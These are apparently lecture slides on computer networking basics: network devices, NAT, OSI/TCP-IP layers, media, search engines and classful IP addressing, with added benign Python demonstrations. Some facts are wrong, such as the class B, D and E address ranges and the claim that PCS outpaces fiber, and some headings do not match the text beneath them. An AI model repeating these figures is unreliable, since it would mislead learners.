Unit III
INTRODUCTION TO COMPUTER NETWORKS
• 1969 – 4
• 1971 – 15
• 1984 – 1000
• 1987 – 10,000
• 1989 – 100,000
• 1992 – 1,000,000
• 1996 – 10,000,000
• 2001 – 100,000,000
• By 2005… billions
Typical LAN (Local Area Network)
[Figure: a typical LAN built around a hub or switch]
Client/Server Networks
• Client/Server network
Network Hardware
• The most essential networking hardware devices
for us to learn about are:
– Cables
– NICs
– Hubs
– Switches
– Routers
Wire Media
Media Bandwidth
Hubs
• A “hub” is a networking component into which you can plug multiple network devices
– Connect computers, printers, scanners, etc.
• Anytime a connected device sends a network message, the
hub forwards the message to all other connected devices (not
just the intended recipient!)
– Unintended recipients should ignore bogus network traffic (akin to
“screening” telephone calls)
– Creates opportunities for deviant “packet sniffers”
• Hub can only deal with one message at a time, since it is
broadcast over all connections
Switches
• A switch is a network device which directs traffic only to its
intended destination(s) rather than to all devices on the
network.
– sometimes referred to as an “intelligent hub”
[Figure: A network switch. Station A transmits to Station C; the switch receives the data and sends it back out on a single port only, the one leading to Station C.]
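The difference between the two devices above is easiest to see in a small simulation. The following is an added example, not code from the lecture: a hub that repeats every frame to all other ports, beside a learning switch that records which port each source address arrived on and forwards only there. The station addresses, port numbers and frames are constructed for the demo. The output shows why a hub hands every frame to a would-be packet sniffer on any port, while a switch only does so until it has learned the destination's port.

```python
"""Hub vs. learning switch: which ports observe each frame?

Added illustration for the hubs/switches slides; not code from the lecture.
A frame carries a source MAC, a destination MAC and a payload; devices are
attached to numbered ports. All names and values here are constructed.
"""
from dataclasses import dataclass


@dataclass
class Frame:
    src: str
    dst: str
    payload: str


class Hub:
    """A hub repeats every frame out of every port except the one it arrived on."""

    def __init__(self, ports):
        self.ports = list(ports)

    def forward(self, in_port, frame):
        return [p for p in self.ports if p != in_port]


class LearningSwitch:
    """A switch learns which port each source MAC lives on and forwards only
    to the learned port; an unknown destination is flooded, like a hub would."""

    def __init__(self, ports):
        self.ports = list(ports)
        self.mac_table = {}  # MAC address -> port it was last seen on

    def forward(self, in_port, frame):
        self.mac_table[frame.src] = in_port          # learn the sender's port
        out = self.mac_table.get(frame.dst)
        if out is None or out == in_port:
            return [p for p in self.ports if p != in_port]  # flood
        return [out]


def run_conversation(device, exchange):
    """Replay (in_port, frame) pairs; return the list of ports that saw each frame."""
    return [device.forward(port, frame) for port, frame in exchange]


# Constructed sample: station A on port 1, station C on port 3, a bystander on port 2.
EXCHANGE = [
    (1, Frame("aa:aa", "cc:cc", "hello C")),   # A -> C, C's port not yet learned
    (3, Frame("cc:cc", "aa:aa", "hi A")),      # C replies; switch learns port 3
    (1, Frame("aa:aa", "cc:cc", "secret")),    # A -> C again: switch sends to port 3 only
]

if __name__ == "__main__":
    print("hub:   ", run_conversation(Hub([1, 2, 3]), EXCHANGE))
    print("switch:", run_conversation(LearningSwitch([1, 2, 3]), EXCHANGE))
```

With the hub, the bystander on port 2 sees all three frames; with the switch it sees only the first, flooded because the switch had not yet learned where "cc:cc" lives.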
Routers
Different networks connect via routers (not switches or hubs).
Routers even connect networks based on different protocols, which is important since not all networks use the same protocol.
[Figure: Network X and Network Z, each built from switches, connected to each other through routers]
Gateway router
• When your computer needs to contact a computer
that is not within the immediate network (i.e., your
LAN), then your computer’s networking software is
configured to send the request to a particular router
called a:
– Default Gateway, or
– Gateway router
• For each of us, the most noteworthy role of the
gateway router is to connect your computer’s LAN to
your ISP’s larger network so that your computer
accesses the Internet
• Therefore, a gateway router is your computer’s
onramp to the Internet.
Standard networking protocols
(communications standards)
• The committee that addresses LAN standards is called the
IEEE 802 Committee.
– Thus, IEEE LAN protocols always start with the number 802.
• “Ethernet” is a particular protocol published by this
committee as their “802.3” protocol.
– Ethernet (802.3) is the world’s #1 standard wired-LAN protocol
– There are other protocols besides Ethernet, but it is dominant
• Most PCs’ NICs support 10/100/1000 Mbps Ethernet.
Packet switching
• The Ethernet (IEEE 802.3) standard transmits data in little
chunks called packets
• Break long messages into short “packets”
– Keeps one user from hogging a line
– Each packet is tagged with where it’s going
• Route each packet separately
– Each packet often takes a different route
– Packets often arrive out of order
– Receiver must reconstruct original message
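The four steps above (split, tag, route independently, reconstruct) as an added example, not code from the lecture. The packet format, the chunk size and the destination name are constructed; the sequence number in each tag is what lets the receiver rebuild the message when packets arrive out of order, and the reassembler refuses to return a message with a packet missing rather than silently returning a truncated one.

```python
"""Packetizing a message, delivering packets out of order, and reassembling.

Added illustration for the packet-switching slide; not code from the lecture.
The packet layout (dst, seq, total, data) is constructed for the demo.
"""
import random


def packetize(message: bytes, size: int, dst: str):
    """Split a message into chunks of at most `size` bytes. Each packet is
    tagged with where it is going plus a sequence number and the total count,
    so the receiver can put the chunks back in order."""
    chunks = [message[i:i + size] for i in range(0, len(message), size)]
    total = len(chunks)
    return [{"dst": dst, "seq": i, "total": total, "data": chunk}
            for i, chunk in enumerate(chunks)]


def deliver(packets, seed=0):
    """Model independent routing: the packets arrive in an arbitrary order."""
    arrived = list(packets)
    random.Random(seed).shuffle(arrived)
    return arrived


def reassemble(packets):
    """Rebuild the message from packets that may have arrived out of order.
    Returns None if any packet is missing, so the caller can ask for a resend
    instead of accepting a truncated message."""
    if not packets:
        return None
    total = packets[0]["total"]
    by_seq = {p["seq"]: p["data"] for p in packets}
    if set(by_seq) != set(range(total)):
        return None
    return b"".join(by_seq[i] for i in range(total))


def roundtrip(message: bytes, size: int = 4, seed: int = 1) -> bytes:
    """Send a message through packetize -> deliver -> reassemble."""
    return reassemble(deliver(packetize(message, size, "host-c"), seed))


if __name__ == "__main__":
    msg = b"Break long messages into short packets"
    pkts = packetize(msg, 8, "host-c")
    print("arrival order:", [p["seq"] for p in deliver(pkts, seed=1)])
    print(roundtrip(msg, 8))
```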
TCP/IP
• Transmission Control Protocol/Internet Protocol (TCP/IP) provides the technical foundation for the public Internet as well as for large numbers of private networks. It is defined in terms of layers.
• Do you use TCP/IP?
– If you are on the Internet, yes, you are using TCP/IP.
• TCP/IP layers
[Figure: the TCP/IP layers at left, with particular implementations of each layer at right]
Packet
[Figure: a packet with its IP address fields, a sender (source) field and a destination field]
http://www.yougetsignal.com/tools/visual-tracert/
Wireless networking
• Wireless fidelity (wi-fi) – a means of linking computers into a
wireless local area network (WLAN)
• Also referred to as 802.11
• Wi-Fi has evolved through various standards, the most
common of which have been:
– 802.11b, with 11 Mbps bandwidth
[Figure: NAT. You (192.168.0.1) sit behind your router, whose public address is 24.48.0.1; your BFF is at 12.6.1.3. Packets from you leave the router with source 24.48.0.1, and your BFF's replies are addressed to 24.48.0.1.]
Your router’s NAT feature modifies your outgoing packets such that their source IP becomes 24.48.0.1. Your BFF’s chat program thus sends its response to 24.48.0.1. (Your router’s NAT function also changes the destination IP on the response packets it later receives from your BFF to 192.168.0.1.)
[Figure: Corporate router with port mapping and NAT activated. The router's public address is 224.60.32.1; you connect to it from 24.48.0.1. Port mapping sends 224.60.32.1:21 to the FTP server and 224.60.32.1:80 to the web server behind the router.]
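The two figures above describe the same mechanism from both directions: outbound, the router rewrites your private source address (and a port) to its public address and remembers the mapping so the reply can be sent back to you; inbound, a static port mapping hands traffic for a published port to a server inside. The following added example, not code from the lecture, models that router. The IP addresses are the ones on the slides; the inside addresses of the FTP and web servers, the chat port and the dynamic port range are constructed. Inbound packets that match neither a remembered mapping nor a published port are dropped, which is the incidental protection a NAT router gives an inside host.

```python
"""Outbound NAT (source address/port rewriting) plus inbound port mapping.

Added illustration for the NAT and port-mapping slides; not code from the
lecture. Addresses come from the slides; the inside server addresses, the
chat port 5222 and the dynamic port range are constructed for the demo.
"""


class NatRouter:
    def __init__(self, public_ip, port_map=None, first_port=40000):
        self.public_ip = public_ip
        self.port_map = dict(port_map or {})   # public port -> (inside ip, inside port)
        self.next_port = first_port            # next free public port for outbound flows
        self.outbound = {}                     # (inside ip, port) -> public port
        self.inbound = {}                      # public port -> (inside ip, port)

    def translate_outbound(self, pkt):
        """Rewrite the source of a packet leaving the LAN to the public IP and a
        unique public port, remembering the mapping so the reply finds its way back."""
        key = (pkt["src"], pkt["sport"])
        if key not in self.outbound:
            self.outbound[key] = self.next_port
            self.inbound[self.next_port] = key
            self.next_port += 1
        out = dict(pkt)
        out["src"], out["sport"] = self.public_ip, self.outbound[key]
        return out

    def translate_inbound(self, pkt):
        """Rewrite the destination of a packet arriving from the Internet.
        Replies to earlier outbound traffic and statically mapped ports are
        forwarded inside; anything else is dropped (None)."""
        if pkt["dst"] != self.public_ip:
            return None
        target = self.inbound.get(pkt["dport"]) or self.port_map.get(pkt["dport"])
        if target is None:
            return None
        out = dict(pkt)
        out["dst"], out["dport"] = target
        return out


def chat_roundtrip():
    """You (192.168.0.1) talk to your BFF (12.6.1.3) through a router at 24.48.0.1.
    Returns (packet as seen by the BFF, reply as delivered to you)."""
    router = NatRouter("24.48.0.1")
    outbound = router.translate_outbound(
        {"src": "192.168.0.1", "sport": 5000, "dst": "12.6.1.3", "dport": 5222})
    reply = {"src": "12.6.1.3", "sport": 5222,
             "dst": outbound["src"], "dport": outbound["sport"]}
    return outbound, router.translate_inbound(reply)


def corporate_router():
    """Corporate router at 224.60.32.1 mapping :21 to the FTP server and :80 to
    the web server (inside addresses constructed)."""
    return NatRouter("224.60.32.1", {21: ("10.1.0.21", 21), 80: ("10.1.0.80", 80)})


if __name__ == "__main__":
    print(chat_roundtrip())
    r = corporate_router()
    probe = {"src": "24.48.0.1", "sport": 3333, "dst": "224.60.32.1"}
    print(r.translate_inbound({**probe, "dport": 80}))   # forwarded to the web server
    print(r.translate_inbound({**probe, "dport": 22}))   # no mapping: dropped
```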
Problems:
• Speed
• Reliability
• Security
The 1960s
1971
1973
Growing Pains
• Problem: early networks used incompatible
protocols
Trivia
• Kahn believed that there would
only be ~20 networks.
• He was way off.
• Why?
2000
2006
2009
Takeaways
• Communication is fundamental to human nature
• Key concepts have existed for a long time
– Speed/bandwidth
– Latency
– Switching
– Multiplexing
• The Internet has changed the world
– Promise of free ($) and free (freedom) communication
– Shrunk the world
• What made the Internet so successful? Stay tuned!
[Figure: related terms shown beside the list: Encoding, Cable management, Packets vs. circuits, Routing]
Introduction to Computer Networks 53
Computer Networks
A computer network connects two or more autonomous computers.
Applications of Networks
Resource Sharing
– Hardware (computing resources, disks, printers)
– Software (application software)
Information Sharing
– Easy accessibility from anywhere (files, databases)
– Search Capability (WWW)
Communication
– Email
– Message broadcast
Remote computing
Distributed processing (GRID Computing)
Network Topology
The network topology defines the way in which computers, printers, and other devices are connected. A network topology describes the layout of the wire and devices as well as the paths used by data transmissions.
Bus Topology
Commonly referred to as a linear bus, all the devices on a bus topology are connected by one single cable.
Ring Topology
A frame travels around the ring, stopping at each node. If a node wants to transmit data, it adds the data as well as the destination address to the frame.
The frame then continues around the ring until it finds the destination node, which takes the data out of the frame.
Single ring – All the devices on the network share a single cable.
Dual ring – The dual ring topology allows data to be sent in both directions.
Mesh Topology
The mesh topology connects all devices (nodes) to each other for redundancy and fault tolerance.
It is used in WANs to interconnect LANs and for mission critical networks like those used by banks and financial institutions.
Implementing the mesh topology is expensive and difficult.
Network Components
– Physical Media
– Interconnecting Devices
– Computers
– Networking Software
– Applications
Networking Media
Networking media can be defined simply as the means by which signals (data) are sent from one computer to another (either by cable or wireless means).
Networking Devices
Hubs, switches, routers, wireless access points, modems, etc.
Applications
E-mail
Searchable Data (Web Sites)
E-Commerce
News Groups
Internet Telephony (VoIP)
Video Conferencing
Chat Groups
Instant Messengers
Internet Radio
OSI MODEL
Communication Architecture
Strategy for connecting host computers and other communicating equipment.
Defines necessary elements for data communication between devices.
A communication architecture, therefore, defines a standard for the communicating hosts.
A programmer formats data in a manner defined by the communication architecture and passes it on to the communication software.
Separating communication functions adds flexibility; for example, we do not need to modify the entire host software to include more communication devices.
Layer Architecture
Layer architecture simplifies the network design.
It is easy to debug network applications in a layered architecture network.
Network management is easier due to the layered architecture.
Network layers follow a set of rules, called a protocol.
The protocol defines the format of the data being exchanged, and the control and timing for the handshake between layers.
Physical Layer
Provides the physical interface for transmission of information.
Network Layer
Implements routing of frames (packets) through the network.
Defines the most optimum path the packet should take from the source to the destination.
Defines logical addressing so that any endpoint can be identified.
Handles congestion in the network.
Facilitates interconnection between heterogeneous networks (Internetworking).
The network layer also defines how to fragment a packet into smaller packets to accommodate different media.
Transport Layer
The purpose of this layer is to provide a reliable mechanism for the exchange of data between two processes in different computers.
Session Layer
The session layer provides a mechanism for controlling the dialogue between the two end systems. It defines how to start, control and end conversations (called sessions) between applications.
This layer requests a logical connection to be established on an end-user’s request.
Any necessary log-on or password validation is also handled by this layer.
The session layer is also responsible for terminating the connection.
This layer provides services like dialogue discipline, which can be full duplex or half duplex.
The session layer can also provide a check-pointing mechanism such that if a failure of some sort occurs between checkpoints, all data can be retransmitted from the last checkpoint.
Presentation Layer
The presentation layer defines the format in which the data is to be exchanged between the two communicating entities.
It also handles data compression and data encryption (cryptography).
Application Layer
The application layer interacts with application programs and is the highest level of the OSI model.
The application layer contains management functions to support distributed applications.
Examples of the application layer are applications such as file transfer, electronic mail, remote login etc.
OSI in Action
A message begins at the top application layer and moves down the OSI layers to the bottom physical layer.
As the message descends, each successive OSI model layer adds a header to it.
A header is layer-specific information that basically explains what functions the layer carried out.
Conversely, at the receiving end, headers are stripped from the message as it travels up the corresponding layers.
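The header-adding and header-stripping described above, as an added example that is not code from the lecture. Four layers are modelled (application, transport, network, link); each prepends a small header to whatever it receives from the layer above, and the receiver peels them off in the reverse order. The header layout (a layer tag, a length, then the layer's information) and all addresses are constructed for the demo, not real protocol formats; the point is the order of operations and that a layer rejects a frame whose outermost header is not its own.

```python
"""Encapsulation down the stack and header stripping on the way back up.

Added illustration for the "OSI in Action" slide; not code from the lecture.
Each layer prepends its own header; the receiver removes them in reverse order.
The header layout and the addresses are constructed, not real protocol formats.
"""
import struct

# Constructed layer order, top to bottom (the slide's physical layer is the wire itself).
LAYERS = ["application", "transport", "network", "link"]


def add_header(layer, payload, info):
    """Prepend a layer-specific header: 1-byte layer tag, 2-byte length of the
    info field, then the info bytes (the layer's addresses, ports, etc.)."""
    tag = LAYERS.index(layer)
    return struct.pack("!BH", tag, len(info)) + info + payload


def strip_header(layer, data):
    """Remove this layer's header; return (header info, remaining payload).
    Raises if the outermost header belongs to a different layer."""
    tag, info_len = struct.unpack("!BH", data[:3])
    if tag != LAYERS.index(layer):
        raise ValueError(f"expected {layer} header, found tag {tag}")
    return data[3:3 + info_len], data[3 + info_len:]


def send(message: bytes, headers: dict) -> bytes:
    """Walk the message down the stack, top layer first, so the link header ends up outermost."""
    data = message
    for layer in LAYERS:
        data = add_header(layer, data, headers[layer])
    return data


def receive(frame: bytes):
    """Walk the frame up the stack, bottom layer first, collecting each header."""
    seen = {}
    data = frame
    for layer in reversed(LAYERS):
        seen[layer], data = strip_header(layer, data)
    return seen, data


# Constructed per-layer header information.
HEADERS = {
    "application": b"GET",
    "transport": b"port 80",
    "network": b"10.0.0.1 -> 10.0.0.2",
    "link": b"aa:aa -> bb:bb",
}

if __name__ == "__main__":
    frame = send(b"hello", HEADERS)
    print(len(frame), "bytes on the wire:", frame)
    print(receive(frame))
```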
TCP/IP MODEL
TCP/IP Model
Application Layer – application programs using the network
Transport Layer (TCP/UDP) – management of end-to-end message transmission, error detection and error correction
Network Layer (IP) – handling of datagrams: routing and congestion
Data Link Layer – management of cost-effective and reliable data delivery, access to physical networks
Physical Layer – physical media
The Internet
Introductory material.
An overview lecture that covers Internet related topics, including a
definition of the Internet, an overview of its history and growth, and
standardization and naming.
A Definition
• On October 24, 1995, the FNC unanimously passed a
resolution defining the term Internet.
[Figure: Number of Hosts on the Internet, log scale from 100 to 1,000,000,000, plotted from Aug-81 to Aug-01. Source: Internet Software Consortium]
Internet Infrastructure
[Figure: local ISPs and a corporate campus network attach to the backbone network through IXPs]
Telecommunications & The Internet
[Figure: two computers exchange digital signals; each connects to a modem, and the modems send analog (audio) signals over phone lines]
Channels
• Twisted wire (twisted pair)
• Coaxial Cable
• Fiber Optics
• Microwave
• Newer Wireless
Twisted Pair
• Low cost
• easy to work with
• installed infrastructure
• crosstalk
• 300bps to 100Mbps
• “This modem is 56Kbps capable. However, current regulations limit download speeds to 53Kbps,” reads the fine print from a typical modem advertisement.
DSL
• Uses existing twisted pair
• 256Kbps to 40Mbps
• Loop length max about 18,000 ft.
• More correctly ADSL (Asymmetric Digital
Subscriber Line) with download speeds
different from upload speeds.
Coaxial Cable
• More expensive
• harder to work with
• not as extensive an existing infrastructure
– cable TV companies are changing this
• 56Kbps to 550Mbps
Fiber Optics
• Very expensive
• difficult to work with
• existing infrastructure limited to backbones
• 500Kbps to 30Gbps
Microwave
• Not as expensive as land lines
• Limited to line of sight (towers)
– reasonable infrastructure
• Satellite bounce increases expense
– geo-synchronous (22,000 miles)
– low earth orbit (cheaper, lower power)
• 256Kbps to 100Mbps
Newer Wireless
– Cellular
– mobile data networks
– personal communications services (PCS)
Transmission Speed
• BPS, bits-per-second, the amount of
information that can be transmitted through a
channel
• BAUD - a binary event, a signal change from
positive to negative or vice versa.
Speed II
• At higher speeds a single signal change can transmit more than one bit at a time, so the bit rate will generally be higher than the baud rate.
• Transmission capacity is a function of the frequency; higher frequency means higher capacity.
More Speed
• Bandwidth = range of frequencies that a
channel can support (difference between
highest and lowest frequency).
• Greater range means greater bandwidth.
• Greater bandwidth means greater
transmission capacity.
Faster Yet
• Bandwidth is like pipe diameter.
• Larger diameter pipes can transmit more
water in a given period of time.
• Personal Communication Services, PCSs, have
a greater bandwidth than fiber optics.
Communications Processors
[Figure: a computer (CPU and channel) connects through a front-end processor and controller to a concentrator and a multiplexer, which serve terminals (T) and PCs]
Network Topology
• Star Network
• Bus Network
• Ring Network
[Figure: star, bus and ring layouts drawn with computers (C) and printers (P)]
Networks
• Local Area Network, LAN
• Wide Area Network, WAN
• Value Added Network, VAN
Network Terms
• File server
• Print server
• Gateway - connects dissimilar networks
• Bridge - connects similar networks
• Routers - connect networks & direct traffic
• Similar networks = same network protocols
Transmission on LANs
• Token Ring
– can talk only when you have the token
– cost more than Ethernet
– better for high volume traffic
• Ethernet
– talk whenever you want
– send again if collision
– works best with low volume traffic
Internet Capabilities
Tier 1 Networks
• The largest backbones on the Internet: Centurylink, Telecom Italia, Verizon, Sprint, TeliaSonera International, NTT Communications, Deutsche Telekom, Level 3, AT&T
• These top branded backbones only trade peering traffic among themselves.
Common Bandwidths
• 56K modem 0.056 Mbps
• ADSL 40 Mbps
• Cable Modem 50 Mbps
• T1 1.5 Mbps
• Ethernet 10 to 1,000 Mbps
• T3 44.7 Mbps
• See http://bandwidthplace.com/
Intranets
• An internal network based on World Wide
Web technology
• Firewall
– security software to prevent unauthorized
access to an intranet
• Firebreak
– a physical break between the Internet and
Intranet
IP Addresses
• An identifier for a computer or device on a
TCP/IP network. Networks using the TCP/IP
protocol route messages based on the IP
address of the destination. The format of an IP
address is a 32-bit numeric address written as
four numbers separated by periods. Each
number can be zero to 255. For example,
1.160.10.240 could be an IP address.
IP Address Registries
Internet Infrastructure
• Location where a network (ISP, corporate
network, or regional network) gets access to the
Internet is called a Point-of-Presence (POP).
• Locations where (Tier-1 or Tier-2) networks are connected for the purpose of exchanging traffic are called peering points.
– Public peering: Traffic is swapped in a specific location, called an Internet exchange point (IXP)
– Private peering: Two networks establish a direct link to each other.
Organization of a single node in a Tier-1 network
[Figure: routers (labelled 3Com and Bay Networks) joined to peering points, to leased links to customers, to metropolitan area networks, and through a modem bank to dial-up and leased links to customers]
Assigning Identifiers for the Internet
Review
• E-mail
• Research
• Shopping
• News
• Games
• Ed-line
Internet Terms
• WWW
• Browser
• Search Engine
• URL
• Domain
• html
WWW
• The World Wide Web
Browser
• Software program that allows a person
to view WWW documents. Examples of
browsers are Netscape, Microsoft
Internet Explorer, Mosaic, Mac web,
and Net cruiser.
Search Engine
• A web site that will help you search the
Internet for key words, subjects, etc.
URL
• UNIFORM RESOURCE LOCATOR- The
unique address of any web page. It tells
your computer where the information is
stored so it can be viewed.
Domain
• A way to indicate what type of site you may
be viewing. In the U.S. some common domains
are .com-commercial, .org- non-profit and
research organizations, .gov- government
agency, .edu-education. More are constantly
being added, so these should only be used as guidelines to help you know what type of site you are on.
Internet Connection
• Logistics (the ICT Manager) will ensure internet service for those using the ACF email service and computers.
• The mission standard is a Local Area Network connection through network cable and wireless access points (Wi-Fi).
• A Local Area Network provides internet access to computers and other devices in a limited area. This connection is established by wire or wirelessly.
2016
[Figure: the Internet is reached through a cable, DSL, VSAT or BLR modem, then a router (WAN side), then the LAN switch and a wireless access point]
August 19, 2021
LAN problems
Wi-Fi (Wireless Fidelity)
LAN Problems
• Wi-Fi or LAN is not connected.
• Wireless might be disabled.
• Cable disconnected, if you are using a patch cord for network connectivity.
• Difference when using cable and Wi-Fi:
– Wi-Fi
– Cable
Popular Search Engines Worldwide
1 - Google
• According to the latest netmarketshare report (January
2018) 74.52% of searches were powered by Google and
only 7.98% by Bing.
• Google is also dominating the mobile/tablet search engine
market share with 93%!
• Want to learn how to take advantage of Google’s search
engine share?
– Read: How long does it take to rank in Google
2 - Bing
• Bing is Microsoft’s attempt to challenge Google in the area
of search.
• Despite their efforts they still did not manage to convince
users that their search engine can produce better results
than Google.
3 - Yahoo! Search
4 - Ask
• Formerly known as Ask Jeeves, Ask.com receives approximately
0.05% of the search share.
• ASK is based on a question/answer format where most
questions are answered by other users or are in the form of
polls.
• It also has the general search functionality but the results
returned lack quality compared to Google or even Bing and
Yahoo.
5 - Aol Search
• According to netmarketshare the old time famous AOL is
still in the top 10 search engines with a market share that
is close to 0.04%.
• The AOL network includes many popular web sites like
engadget.com, techchrunch.com and the
huffingtonpost.com.
6. Baidu
• Baidu was founded in 2000 and it is the most popular
search engine in China.
• Its market share is increasing steadily and, according to Wikipedia, Baidu is serving billions of search queries per month.
• It is currently ranked at position 4 in the Alexa Rankings.
7. Wolframalpha
• Wolframalpha is different from all the other search engines.
• They market it as a Computational Knowledge Engine
which can give you facts and data for a number of topics.
• It can do all sorts of calculations, for example if you
enter “mortgage 2000” as input it will calculate your loan
amount, interest paid etc. based on a number of
assumptions.
8. DuckDuckGo
9. Internet Archive
Dogpile
• Since the last two don’t work, let’s try one that does.
• Lynx: Lou Montulli released the web browser Lynx 2.0 in March 1993.
• The Mozilla project was created in 1998 with the release of the
Netscape browser suite source code that was intended to harness
the creative power of thousands of programmers on the Internet.
What Groups are Responsible for
Managing it?
• Instead of just working on Netscape's next browser, people started
creating a variety of browsers, development tools and a range of other
projects.
• In ten years the community has shown that commercial companies can
benefit by collaborating in open source projects and that great end user
products can be produced as open source software.
Future Technology
• Worldwide Market Shares
• Influence of Google Chrome
• Competition amongst Web Browsers
Addressing
• An IP address is 32 bits long.
• It is usually written as four decimal numbers separated by dots (periods): dotted decimal notation.
• Each of the four numbers (8 bits, i.e. two hexadecimal digits) is called an octet.
• Example: 137.207.192.003 or 89 CF C0 03
• An IP address contains a network part and a host part.
• The number of address bits used to identify the network, and the number used to identify the host, vary according to the class of the address.
• Routers or gateways have one or more addresses (depending on the number of links they have).
• The three main address classes are class A, class B, and class C.
• By examining the first few bits of an address, IP software can quickly determine the address class, and therefore its structure.
Note:
For Class A: Have a first dotted decimal number in the range 1-126
For Class B: Have a first dotted decimal number in the range 128-191
For Class C: Have a first dotted decimal number in the range 192-223
IP Addressing
• There are five forms of IP addresses:
– Class A: 126 networks, each can have up to (16M-2) nodes. (1.0.0.0 - 126.0.0.0)
– Class B: (16K-2) networks, each can have up to (64K-2) nodes. (127.0.0.0 - 191.255.0.0)
– Class C: (2M-2) networks, each can have up to 254 nodes. (192.0.0.0 - 223.255.255.0)
– Class D: a multicast address. (224.0.0.0 - 240.0.0.0)
– Class E: reserved for future use. (241.0.0.0 - 248.0.0.0)
IP address format
IP address
For example:
The address (binary) - 10000000 00000111 00001111 00000001
has the DECIMAL DOT NOTATION: 128.7.15.1
It belongs to Class B addresses.
Its Network-id is: 128.7
Its Host-id is: 15.1
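The class test by leading bits and the network-id/host-id split from the slides above, as an added example that is not code from the lecture. It parses dotted-decimal notation, classifies the address the way the "examining the first few bits" slide describes (one, two, three or four leading bits), and splits classes A, B and C at 8, 16 and 24 network bits; classes D and E have no host part. The sample addresses other than 128.7.15.1 and 137.207.192.3 are constructed.

```python
"""Classful IPv4 address inspection: class from the leading bits, then the
network-id / host-id split.

Added illustration for the addressing slides; not code from the lecture.
Applies the class rules stated on the slides: class A/B/C/D are recognised
by leading bits 0, 10, 110, 1110; class A/B/C hold 24/16/8 host bits.
"""


def parse_ipv4(text: str) -> int:
    """Dotted decimal -> 32-bit integer, rejecting malformed input."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError("expected four dotted-decimal numbers")
    value = 0
    for p in parts:
        n = int(p)
        if not 0 <= n <= 255:
            raise ValueError("each number must be 0..255")
        value = (value << 8) | n
    return value


def to_dotted(value: int, octets: int = 4) -> str:
    """Integer -> dotted decimal using the given number of octets."""
    return ".".join(str((value >> (8 * i)) & 0xFF) for i in reversed(range(octets)))


def address_class(value: int) -> str:
    """Examine the first few bits, as IP software does, to find the class."""
    if value >> 31 == 0b0:
        return "A"
    if value >> 30 == 0b10:
        return "B"
    if value >> 29 == 0b110:
        return "C"
    if value >> 28 == 0b1110:
        return "D"
    return "E"


def split_address(text: str):
    """Return (class, network-id, host-id) in dotted notation.
    Classes D (multicast) and E have no network/host split, so those are None."""
    value = parse_ipv4(text)
    cls = address_class(value)
    host_bits = {"A": 24, "B": 16, "C": 8}.get(cls)
    if host_bits is None:
        return cls, None, None
    net_octets = (32 - host_bits) // 8
    network = to_dotted(value >> host_bits, net_octets)
    host = to_dotted(value & ((1 << host_bits) - 1), host_bits // 8)
    return cls, network, host


if __name__ == "__main__":
    # 128.7.15.1 and 137.207.192.3 are from the slides; the rest are constructed.
    for addr in ("128.7.15.1", "137.207.192.3", "10.1.2.3", "200.1.2.3", "224.0.0.1"):
        print(addr, "->", split_address(addr))
```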
IP Addresses assignment example
Class A
|_|_______| |________________________|
  7 bits                24 bits
  Network Part          Host Part
Class B
|__| the first two bits are used to determine the class to which an address belongs, for a class B address.
|__|______|________| |________________|
  14 bits Network part   16 bits Host part
Class C
|___| the first three bits are used to determine the class to which an address belongs, for a class C address.
|________| 8 bits are used for the host address. Therefore, each Class C network can have 2^8 = 256 hosts.
Summary
• Class A:Few networks, each with many hosts.
• Class B: Medium number of networks, each
with a medium number of hosts
• Class C: Many networks, each with a few
hosts.
Loopback Address
• IP defines a loopback address used to test network applications.
• Programmers often use loopback testing for preliminary
debugging after a network application has been created.
• To perform a loopback test, a programmer must have two
application programs that are intended to communicate across a
network.
• Each application includes the code needed to interact with
TCP/IP protocol software.
• Instead of executing each program on a separate computer, the
programmer runs both programs on a single computer and
instructs them to use a loopback IP address when
communicating.
Loopback Address
• When one application sends data to another, data travels
down the protocol stack to the IP software and then IP
software forwards it up through the protocol stack to the
second program.
• Thus programmer can test the program logic quickly
without using two computers and without sending packets
across the network.
• During loopback testing, packets do not leave the computer; the IP software forwards the packets from one application to another application.
• The loopback address never appears in a packet travelling across a network.
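The loopback test described above, as an added example that is not code from the lecture: two programs that would normally run on two machines, a tiny server that upper-cases what it receives and a client that sends a line, both run in one process and both use 127.0.0.1 (the loopback address; the slides do not name it). The server binds to port 0 so the operating system picks a free port, and the whole exchange goes through the TCP/IP stack without any packet reaching a network interface.

```python
"""Two programs on one computer talking over the loopback address.

Added illustration for the loopback slides; not code from the lecture.
The "server" and "client" would normally sit on two machines; here both use
127.0.0.1, so the IP software hands the data straight from one to the other.
"""
import socket
import threading

LOOPBACK = "127.0.0.1"


def serve_once(listener: socket.socket):
    """Accept one connection, upper-case whatever arrives, send it back."""
    conn, _ = listener.accept()
    with conn:
        data = conn.recv(1024)
        conn.sendall(data.upper())


def client(port: int, message: bytes) -> bytes:
    """Connect to the server over loopback and return its reply."""
    with socket.create_connection((LOOPBACK, port), timeout=5) as s:
        s.sendall(message)
        return s.recv(1024)


def loopback_test(message: bytes = b"ping") -> bytes:
    """Run server and client in one process; return the client's reply."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((LOOPBACK, 0))          # port 0: let the OS choose a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    server = threading.Thread(target=serve_once, args=(listener,), daemon=True)
    server.start()
    try:
        reply = client(port, message)
    finally:
        server.join(timeout=5)
        listener.close()
    return reply


if __name__ == "__main__":
    print(loopback_test(b"hello over loopback"))
```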
Address Depletion
• The TCP/IP designers did not think about the enormous scale of
today's network.
• When TCP/IP was being designed, networking was limited to
large organizations that could afford substantial computer
systems.
• The idea of a powerful UNIX system on every desktop, or X-
terminal or a PC with X-Ware (PC software to emulate X-
terminal) did not exist.
• At that time, a 32-bit address seemed so large that it was divided into classes to reduce the processing load on routers.
Address Depletion
• For example, assigning a large network a single class B address,
instead of few class C addresses, reduces the load on the router,
because the router only needs to keep one route for that entire
organization.
• However, the organization that was given the class B address
probably does not have 64,000 computers, so most of the host
addresses available to the organization will never be assigned.
• The current design, which favors routers over growth, is under critical strain from the rapid growth of the Internet. At the present rate of growth, all class B addresses could be exhausted soon!
• To prevent this, blocks of class C addresses are being assigned to organizations, but each class C address requires its own entry within the routing table.
• This solution could cause the routing table to grow so rapidly that the routers will soon be overwhelmed.
Address Depletion
These problems are being addressed by the ROAD (Routing and Addressing) working group of the Internet Engineering Task Force (IETF). They are looking for a scheme that:
• improves the problem of address depletion, perhaps by moving to a larger address (a 160-bit address!);
• uses classless addresses;
• can be implemented in new routers without requiring changes to the end-systems (the hosts).
